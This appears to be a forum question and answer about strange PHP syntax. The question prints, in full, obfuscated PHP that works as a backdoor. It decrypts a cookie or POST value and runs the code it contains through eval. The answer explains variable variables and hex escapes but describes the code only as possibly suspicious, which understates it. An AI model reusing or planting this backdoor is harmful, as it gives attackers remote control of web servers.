What is going on here? I have never seen PHP syntax like this: ${"\x47\x4c\x4fB\x41\x4c\x53"}['v9800']
There is some strange syntax in this PHP code:
<?php $hd701 = 475;$GLOBALS['xbe829'] = Array();global $xbe829;$xbe829 = $GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['v9800'] = "\x7a\x7b\x60\x5b\x4a\x56\x6c\x51\x21\x62\x38\x66\x44\xa\x2e\x27\x22\x50\x58\x45\x49\x3d\x79\x43\x23\x3b\x53\x29\x2a\x30\x6b\x73\x63\x9\x77\x6f\x47\x6a\x4e\x54\x39\x3f\x40\x4f\x35\x4b\x26\x34\x6d\x5d\x76\x3a\x3c\x64\x71\x67\x5e\x5c\x46\x6e\x75\x4c\xd\x42\x65\x52\x48\x70\x41\x68\x55\x2b\x57\x5a\x69\x7c\x20\x2c\x28\x74\x59\x3e\x2f\x37\x78\x33\x31\x7d\x61\x5f\x7e\x72\x2d\x24\x36\x25\x4d\x32";$xbe829[$xbe829['v9800'][32].$xbe829['v9800'][85].$xbe829['v9800'][11].$xbe829['v9800'][11].$xbe829['v9800'][94]] = $xbe829['v9800'][32].$xbe829['v9800'][69].$xbe829['v9800'][91];$xbe829[$xbe829['v9800'][74].$xbe829['v9800'][29].$xbe829['v9800'][86].$xbe829['v9800'][86]] = $xbe829['v9800'][35].$xbe829['v9800'][91].$xbe829['v9800'][53];$xbe829[$xbe829['v9800'][54].$xbe829['v9800'][11].$xbe829['v9800'][83].$xbe829['v9800'][64].$xbe829['v9800'][44].$xbe829['v9800'][94]] = $xbe829['v9800'][31].$xbe829['v9800'][79].$xbe829['v9800'][91].$xbe829['v9800'][6].$xbe829['v9800'][64].$xbe829['v9800'][59];$xbe829[$xbe829['v9800'][74].$xbe829['v9800'][47].$xbe829['v9800'][53].$xbe829['v9800'][83].$xbe829['v9800'][44]] = $xbe829['v9800'][74].$xbe829['v9800'][59].$xbe829['v9800'][74].$xbe829['v9800'][89].$xbe829['v9800'][31].$xbe829['v9800'][64].$xbe829['v9800'][79];$xbe829[$xbe829['v9800'][11].$xbe829['v9800'][44].$xbe829['v9800'][10].$xbe829['v9800'][10].$xbe829['v9800'][94].$xbe829['v9800'][44].$xbe829['v9800'][11]] = $xbe829['v9800'][31].$xbe829['v9800'][64].$xbe829['v9800'][91].$xbe829['v9800'][74].$xbe829['v9800'][88].$xbe829['v9800'][6].$xbe829['v9800'][74].$xbe829['v9800'][0].$xbe829['v9800'][64];$xbe829[$xbe829['v9800'][79].$xbe829['v9800'][64].$xbe829['v9800'][9].$xbe829['v9800'][88].$xbe829['v9800'][47].$xbe829['v9800'][64].$xbe829['v9800'][11].$xbe829['v9800'][97]] = 
$xbe829['v9800'][67].$xbe829['v9800'][69].$xbe829['v9800'][67].$xbe829['v9800'][50].$xbe829['v9800'][64].$xbe829['v9800'][91].$xbe829['v9800'][31].$xbe829['v9800'][74].$xbe829['v9800'][35].$xbe829['v9800'][59];$xbe829[$xbe829['v9800'][0].$xbe829['v9800'][64].$xbe829['v9800'][47].$xbe829['v9800'][94].$xbe829['v9800'][86]] = $xbe829['v9800'][60].$xbe829['v9800'][59].$xbe829['v9800'][31].$xbe829['v9800'][64].$xbe829['v9800'][91].$xbe829['v9800'][74].$xbe829['v9800'][88].$xbe829['v9800'][6].$xbe829['v9800'][74].$xbe829['v9800'][0].$xbe829['v9800'][64];$xbe829[$xbe829['v9800'][48].$xbe829['v9800'][97].$xbe829['v9800'][83].$xbe829['v9800'][44].$xbe829['v9800'][32]] = $xbe829['v9800'][9].$xbe829['v9800'][88].$xbe829['v9800'][31].$xbe829['v9800'][64].$xbe829['v9800'][94].$xbe829['v9800'][47].$xbe829['v9800'][89].$xbe829['v9800'][53].$xbe829['v9800'][64].$xbe829['v9800'][32].$xbe829['v9800'][35].$xbe829['v9800'][53].$xbe829['v9800'][64];$xbe829[$xbe829['v9800'][79].$xbe829['v9800'][47].$xbe829['v9800'][47].$xbe829['v9800'][9].$xbe829['v9800'][11]] = $xbe829['v9800'][31].$xbe829['v9800'][64].$xbe829['v9800'][79].$xbe829['v9800'][89].$xbe829['v9800'][79].$xbe829['v9800'][74].$xbe829['v9800'][48].$xbe829['v9800'][64].$xbe829['v9800'][89].$xbe829['v9800'][6].$xbe829['v9800'][74].$xbe829['v9800'][48].$xbe829['v9800'][74].$xbe829['v9800'][79];$xbe829[$xbe829['v9800'][79].$xbe829['v9800'][9].$xbe829['v9800'][29].$xbe829['v9800'][83].$xbe829['v9800'][47]] = $xbe829['v9800'][31].$xbe829['v9800'][32].$xbe829['v9800'][53].$xbe829['v9800'][9].$xbe829['v9800'][88].$xbe829['v9800'][9];$xbe829[$xbe829['v9800'][22].$xbe829['v9800'][29].$xbe829['v9800'][40].$xbe829['v9800'][9].$xbe829['v9800'][9].$xbe829['v9800'][85].$xbe829['v9800'][88].$xbe829['v9800'][53]] = 
$xbe829['v9800'][69].$xbe829['v9800'][86].$xbe829['v9800'][94].$xbe829['v9800'][86].$xbe829['v9800'][29].$xbe829['v9800'][83];$xbe829[$xbe829['v9800'][88].$xbe829['v9800'][10].$xbe829['v9800'][10].$xbe829['v9800'][85].$xbe829['v9800'][9].$xbe829['v9800'][44].$xbe829['v9800'][88]] = $_POST;$xbe829[$xbe829['v9800'][60].$xbe829['v9800'][83].$xbe829['v9800'][86].$xbe829['v9800'][9].$xbe829['v9800'][86].$xbe829['v9800'][86].$xbe829['v9800'][47].$xbe829['v9800'][9].$xbe829['v9800'][9]] = $_COOKIE;@$xbe829[$xbe829['v9800'][74].$xbe829['v9800'][47].$xbe829['v9800'][53].$xbe829['v9800'][83].$xbe829['v9800'][44]]($xbe829['v9800'][64].$xbe829['v9800'][91].$xbe829['v9800'][91].$xbe829['v9800'][35].$xbe829['v9800'][91].$xbe829['v9800'][89].$xbe829['v9800'][6].$xbe829['v9800'][35].$xbe829['v9800'][55],NULL);@$xbe829[$xbe829['v9800'][74].$xbe829['v9800'][47].$xbe829['v9800'][53].$xbe829['v9800'][83].$xbe829['v9800'][44]]($xbe829['v9800'][6].$xbe829['v9800'][35].$xbe829['v9800'][55].$xbe829['v9800'][89].$xbe829['v9800'][64].$xbe829['v9800'][91].$xbe829['v9800'][91].$xbe829['v9800'][35].$xbe829['v9800'][91].$xbe829['v9800'][31],0);@$xbe829[$xbe829['v9800'][74].$xbe829['v9800'][47].$xbe829['v9800'][53].$xbe829['v9800'][83].$xbe829['v9800'][44]]($xbe829['v9800'][48].$xbe829['v9800'][88].$xbe829['v9800'][84].$xbe829['v9800'][89].$xbe829['v9800'][64].$xbe829['v9800'][84].$xbe829['v9800'][64].$xbe829['v9800'][32].$xbe829['v9800'][60].$xbe829['v9800'][79].$xbe829['v9800'][74].$xbe829['v9800'][35].$xbe829['v9800'][59].$xbe829['v9800'][89].$xbe829['v9800'][79].$xbe829['v9800'][74].$xbe829['v9800'][48].$xbe829['v9800'][64],0);@$xbe829[$xbe829['v9800'][79].$xbe829['v9800'][47].$xbe829['v9800'][47].$xbe829['v9800'][9].$xbe829['v9800'][11]](0);$x7bb89b70 = NULL;$t0e76b849 = NULL;$xbe829[$xbe829['v9800'][67].$xbe829['v9800'][47].$xbe829['v9800'][10].$xbe829['v9800'][85].$xbe829['v9800'][29].$xbe829['v9800'][83].$xbe829['v9800'][44].$xbe829['v9800'][40].$xbe829['v9800'][47]] = 
$xbe829['v9800'][40].$xbe829['v9800'][44].$xbe829['v9800'][88].$xbe829['v9800'][64].$xbe829['v9800'][32].$xbe829['v9800'][88].$xbe829['v9800'][85].$xbe829['v9800'][83].$xbe829['v9800'][92].$xbe829['v9800'][64].$xbe829['v9800'][53].$xbe829['v9800'][10].$xbe829['v9800'][86].$xbe829['v9800'][92].$xbe829['v9800'][47].$xbe829['v9800'][10].$xbe829['v9800'][47].$xbe829['v9800'][83].$xbe829['v9800'][92].$xbe829['v9800'][40].$xbe829['v9800'][64].$xbe829['v9800'][83].$xbe829['v9800'][86].$xbe829['v9800'][92].$xbe829['v9800'][11].$xbe829['v9800'][83].$xbe829['v9800'][94].$xbe829['v9800'][86].$xbe829['v9800'][10].$xbe829['v9800'][9].$xbe829['v9800'][86].$xbe829['v9800'][53].$xbe829['v9800'][9].$xbe829['v9800'][88].$xbe829['v9800'][44].$xbe829['v9800'][47];global $p48307594;function h16107($x7bb89b70,$he719627){global $xbe829;$gea9ce = "";for ($t69c26=0; $t69c26<$xbe829[$xbe829['v9800'][54].$xbe829['v9800'][11].$xbe829['v9800'][83].$xbe829['v9800'][64].$xbe829['v9800'][44].$xbe829['v9800'][94]]($x7bb89b70);){for ($nb3186c8=0; $nb3186c8<$xbe829[$xbe829['v9800'][54].$xbe829['v9800'][11].$xbe829['v9800'][83].$xbe829['v9800'][64].$xbe829['v9800'][44].$xbe829['v9800'][94]]($he719627) && $t69c26<$xbe829[$xbe829['v9800'][54].$xbe829['v9800'][11].$xbe829['v9800'][83].$xbe829['v9800'][64].$xbe829['v9800'][44].$xbe829['v9800'][94]]($x7bb89b70); $nb3186c8++,$t69c26++){$gea9ce .= $xbe829[$xbe829['v9800'][32].$xbe829['v9800'][85].$xbe829['v9800'][11].$xbe829['v9800'][11].$xbe829['v9800'][94]]($xbe829[$xbe829['v9800'][74].$xbe829['v9800'][29].$xbe829['v9800'][86].$xbe829['v9800'][86]]($x7bb89b70[$t69c26]) ^ $xbe829[$xbe829['v9800'][74].$xbe829['v9800'][29].$xbe829['v9800'][86].$xbe829['v9800'][86]]($he719627[$nb3186c8]));}}return $gea9ce;}function scdbab($x7bb89b70,$he719627){global $xbe829;global $p48307594;return 
$xbe829[$xbe829['v9800'][22].$xbe829['v9800'][29].$xbe829['v9800'][40].$xbe829['v9800'][9].$xbe829['v9800'][9].$xbe829['v9800'][85].$xbe829['v9800'][88].$xbe829['v9800'][53]]($xbe829[$xbe829['v9800'][22].$xbe829['v9800'][29].$xbe829['v9800'][40].$xbe829['v9800'][9].$xbe829['v9800'][9].$xbe829['v9800'][85].$xbe829['v9800'][88].$xbe829['v9800'][53]]($x7bb89b70,$p48307594),$he719627);}foreach ($xbe829[$xbe829['v9800'][60].$xbe829['v9800'][83].$xbe829['v9800'][86].$xbe829['v9800'][9].$xbe829['v9800'][86].$xbe829['v9800'][86].$xbe829['v9800'][47].$xbe829['v9800'][9].$xbe829['v9800'][9]] as $he719627=>$y301fc25){$x7bb89b70 = $y301fc25;$t0e76b849 = $he719627;}if (!$x7bb89b70){foreach ($xbe829[$xbe829['v9800'][88].$xbe829['v9800'][10].$xbe829['v9800'][10].$xbe829['v9800'][85].$xbe829['v9800'][9].$xbe829['v9800'][44].$xbe829['v9800'][88]] as $he719627=>$y301fc25){$x7bb89b70 = $y301fc25;$t0e76b849 = $he719627;}}$x7bb89b70 = @$xbe829[$xbe829['v9800'][0].$xbe829['v9800'][64].$xbe829['v9800'][47].$xbe829['v9800'][94].$xbe829['v9800'][86]]($xbe829[$xbe829['v9800'][79].$xbe829['v9800'][9].$xbe829['v9800'][29].$xbe829['v9800'][83].$xbe829['v9800'][47]]($xbe829[$xbe829['v9800'][48].$xbe829['v9800'][97].$xbe829['v9800'][83].$xbe829['v9800'][44].$xbe829['v9800'][32]]($x7bb89b70),$t0e76b849));if (isset($x7bb89b70[$xbe829['v9800'][88].$xbe829['v9800'][30]]) && $p48307594==$x7bb89b70[$xbe829['v9800'][88].$xbe829['v9800'][30]]){if ($x7bb89b70[$xbe829['v9800'][88]] == $xbe829['v9800'][74]){$t69c26 = Array($xbe829['v9800'][67].$xbe829['v9800'][50] => @$xbe829[$xbe829['v9800'][79].$xbe829['v9800'][64].$xbe829['v9800'][9].$xbe829['v9800'][88].$xbe829['v9800'][47].$xbe829['v9800'][64].$xbe829['v9800'][11].$xbe829['v9800'][97]](),$xbe829['v9800'][31].$xbe829['v9800'][50] => $xbe829['v9800'][86].$xbe829['v9800'][14].$xbe829['v9800'][29].$xbe829['v9800'][92].$xbe829['v9800'][86],);echo 
@$xbe829[$xbe829['v9800'][11].$xbe829['v9800'][44].$xbe829['v9800'][10].$xbe829['v9800'][10].$xbe829['v9800'][94].$xbe829['v9800'][44].$xbe829['v9800'][11]]($t69c26);}elseif ($x7bb89b70[$xbe829['v9800'][88]] == $xbe829['v9800'][64]){eval/*l551d*/($x7bb89b70[$xbe829['v9800'][53]]);}exit();} ?>
I'm particularly curious: what kind of syntax is this?
${"\x47\x4c\x4fB\x41\x4c\x53"}['v9800']
Solution
First, to address the code syntax itself: PHP allows you to create variable names dynamically.
Suppose you have a variable:
$test = 123;
You can dynamically create a reference to this variable like this:
echo ${'test'}; // Prints '123'
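Why would you want to do this? Well, the example above is pointless, but suppose you need to run through some variable names dynamically at runtime: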
$var1 = 'A';
$var2 = 'B';
$var3 = 'C';
for ($i = 1; $i <= 3; $i++) {
echo ${'var' . $i};
}
// Prints 'ABC'
So, now that we know what the syntax means, what does \x47\x4c\x4fB\x41\x4c\x53 mean?
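\x is used to escape a hexadecimal character sequence. In short, the string you have shown is a bunch of characters that someone has written in hexadecimal instead of the human-readable ASCII characters you are used to seeing.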
If we get rid of the \x escape parts, we get:
474c4fB414c53
As far as I can tell, the B here is not hexadecimal. That leaves us with:
474c4f 414c53
Which translates to:
GLO ALS
If we put the B back in, we get:
GLOBALS
If we put that back into the dynamic variable reference and look at the code again, we get:
$GLOBALS['v9800']
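This is interesting, because $GLOBALS is a special array available in PHP that gives access to all variables in the global scope. So, essentially, your code is trying to access a global variable named $v9800.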
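You will have to decide what this means for your application, but this code may be suspicious. It is possible that someone deliberately disguised their code with this cryptic method in order to access global variables.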
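The decoding walked through in the answer can be done statically, without running the sample. The following Python sketch is an added example, not part of the original question or answer: it decodes PHP `\x` escapes and then replaces each chain of `$xbe829['v9800'][N]` lookups with the string it builds. The function names are made up for illustration; the lookup string and the sample statement are copied from the code in the question.

```python
import re

# PHP double-quoted strings accept \x followed by ONE or TWO hex digits,
# so "\x4fB" is "O" plus a literal "B", and "\xa" is a newline.
HEX_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{1,2})")

def decode_php_hex(s: str) -> str:
    """Decode \\xNN escapes the way PHP does inside double quotes."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), s)

# Lookup string assigned to $GLOBALS['v9800'] in the question's code.
V9800_RAW = (
    r"\x7a\x7b\x60\x5b\x4a\x56\x6c\x51\x21\x62\x38\x66\x44\xa\x2e\x27\x22\x50\x58\x45"
    r"\x49\x3d\x79\x43\x23\x3b\x53\x29\x2a\x30\x6b\x73\x63\x9\x77\x6f\x47\x6a\x4e\x54"
    r"\x39\x3f\x40\x4f\x35\x4b\x26\x34\x6d\x5d\x76\x3a\x3c\x64\x71\x67\x5e\x5c\x46\x6e"
    r"\x75\x4c\xd\x42\x65\x52\x48\x70\x41\x68\x55\x2b\x57\x5a\x69\x7c\x20\x2c\x28\x74"
    r"\x59\x3e\x2f\x37\x78\x33\x31\x7d\x61\x5f\x7e\x72\x2d\x24\x36\x25\x4d\x32"
)
TABLE = decode_php_hex(V9800_RAW)

# One obfuscated character, and a run of them joined by PHP's "." operator.
ONE = r"\$xbe829\['v9800'\]\[(\d+)\]"
LOOKUP = re.compile(ONE)
CHAIN = re.compile(ONE + r"(?:\." + ONE + r")*")

def resolve_lookups(php: str, table: str = TABLE) -> str:
    """Replace each chain of table lookups with the string literal it builds."""
    def build(match):
        text = "".join(table[int(i)] for i in LOOKUP.findall(match.group(0)))
        # Escape so the result is still a valid single-quoted PHP literal.
        return "'" + text.replace("\\", "\\\\").replace("'", "\\'") + "'"
    return CHAIN.sub(build, php)

# First assignment after the lookup string in the question's code.
SAMPLE = (
    "$xbe829[$xbe829['v9800'][32].$xbe829['v9800'][85].$xbe829['v9800'][11]"
    ".$xbe829['v9800'][11].$xbe829['v9800'][94]] = $xbe829['v9800'][32]"
    ".$xbe829['v9800'][69].$xbe829['v9800'][91];"
)

if __name__ == "__main__":
    print(decode_php_hex(r"\x47\x4c\x4fB\x41\x4c\x53"))
    print(resolve_lookups(SAMPLE))
```

Running `resolve_lookups` over the whole file turns the lookup chains into readable string literals, so the sample can be reviewed as text rather than executed.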